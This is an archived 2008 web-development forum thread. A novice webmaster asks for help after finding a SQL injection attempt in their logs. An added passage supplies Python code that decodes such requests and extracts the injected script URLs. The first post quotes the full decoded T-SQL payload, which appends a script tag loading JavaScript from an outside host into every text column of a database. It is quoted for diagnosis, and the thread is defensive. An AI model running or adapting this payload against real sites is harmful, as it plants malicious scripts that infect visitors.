
New To Web Development Forum

    
SQL injection attempt (php/MySQL) help
Advice needed for cleaning up hacked website
Norskie




msg:3719895
 6:54 pm on Aug 10, 2008 (gmt 0)

I have a couple of very simple javascript polls on my site that use MySQL databases to count votes after the user selects an option using a radio button. Today, in our log, I noticed the following, which after researching, seems to be a SQL injection attempt similar to what has been going on lately:

"GET /?;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST
(0x4445434C415245204054207661726368617228323535292C404320766172636861[...]%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"

(note: I inserted page breaks so the code wouldn't stretch the page)

I translated it to this:

DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=['+@C+']+''"></title><script src="http://sdo.1000mg.cn/csrss/w.js"></script><!--'' where '+@C+' not like ''%"></title><script src="http://www.example.com/csrss/w.js"></script><!--''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

I know nothing about php/MySQL other than what I've learned to get the polls working. I used the phpMyAdmin section my webhost provides to check the table structures in the database, and didn't find anything different. Clicking the polls brings up the results just like they should, with no redirects or any other apparent problem.

The SQL is:

SELECT * FROM `revolvepoll_results` WHERE 1

with two fields (candidate and num_votes).

I am wondering if someone can clarify for me whether there is anything else I need to do? I read through the thread in the Databases section but the discussion is too sophisticated for a novice like me.

Thank you for any help you can give.

BTW, I've lurked here a while but forgot the screen name I used to sign up, thus the new sign-up date.

[edited by: mack at 10:29 pm (utc) on Aug. 10, 2008]
[edit reason] removed site url from code just to be safe [/edit]
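
The "translation" step described in the post above, as an added example that is not part of the original thread: it pulls the hex string out of a logged request, decodes it, and lists any script URLs the SQL tried to write, which are the strings to search stored data for. It assumes combined-format access log lines; the sample log entries, the placeholder URL and the `/poll.php` path are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request target and status code from a combined-format access log entry.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d\.\d" (\d{3})')
# The CAST(0x<hex> AS CHAR(n)) wrapper seen in the logged request.
CAST_HEX = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+CHAR", re.I)
SCRIPT_SRC = re.compile(r"<script[^>]*\bsrc\s*=\s*[\"']?([^\"'\s>]+)", re.I)
# Names that exist in Microsoft SQL Server's T-SQL, not in MySQL.
TSQL_MARKERS = ("sysobjects", "syscolumns", "@@fetch_status")

def decode_entry(line):
    """Return (status, decoded SQL) for a hex-CAST request, else None."""
    req = REQUEST.search(line)
    hit = CAST_HEX.search(unquote(req.group(1))) if req else None
    if not hit:
        return None
    hex_text = hit.group(1)  # drop a trailing odd digit if the log cut it off
    return req.group(2), bytes.fromhex(hex_text[: len(hex_text) // 2 * 2]).decode("latin-1")

def analyse(log_lines):
    """Decode every hex-CAST request and summarise what it tried to run."""
    findings = []
    for number, line in enumerate(log_lines, 1):
        entry = decode_entry(line)
        if entry is None:
            continue
        status, sql = entry
        findings.append({
            "line": number,
            "status": status,  # 200 = page was served; says nothing about the SQL
            "sql": sql,
            "script_urls": SCRIPT_SRC.findall(sql),  # strings to search stored data for
            "tsql_markers": [m for m in TSQL_MARKERS if m in sql.lower()],
        })
    return findings

# Constructed sample: harmless SQL text, hex-encoded the way the logged request was.
SAMPLE_SQL = ('DECLARE @T varchar(255) select a.name from sysobjects a '
              '-- <script src="http://placeholder.invalid/w.js"></script>')
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Aug/2008:18:00:00 +0000] "GET /?;DECLARE%20@S%20CHAR(4000);'
    'SET%20@S=CAST(0x' + SAMPLE_SQL.encode().hex().upper() +
    '%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1" 200 6338 "-"',
    '203.0.113.9 - - [10/Aug/2008:18:00:05 +0000] "GET /poll.php?vote=2 HTTP/1.1" 200 512 "-"',
]

if __name__ == "__main__":
    for f in analyse(SAMPLE_LOG):
        print(f["line"], f["status"], f["tsql_markers"], f["script_urls"])
```

Each URL in `script_urls` can then be searched for in the text columns of the site's own tables to see whether anything was appended.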

 

rocknbil




msg:3719955
 10:22 pm on Aug 10, 2008 (gmt 0)

Welcome aboard Norskie, have you seen this thread [webmasterworld.com]? Well discussed there.

Norskie




msg:3719978
 10:58 pm on Aug 10, 2008 (gmt 0)

Yes, thank you rocknbil, I did read that thread before I posted in this forum, but as I said, it is too sophisticated for my understanding. The responses presume a level of knowledge I don't have, which is why I came to this "newbie" forum hoping for some simplified advice.

Perhaps I can boil down my questions to the fundamentals:

1) If I was able to execute my poll javascript from the webpage where it is located, and nothing happened except the poll results output page was generated, can I be sure the attack failed?

2) If I look at the structure of my table with phpMyAdmin, and it shows nothing more than what I set up, can I be sure nothing was inserted into the table? In other words, would it be obvious if something was there?

I am not a programmer, only a casual webmaster, and I just want to be sure my visitors don't end up with something malicious. Thank you again to anyone who has any input.

All trademarks and copyrights held by respective owners. Member comments are owned by the poster.
WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved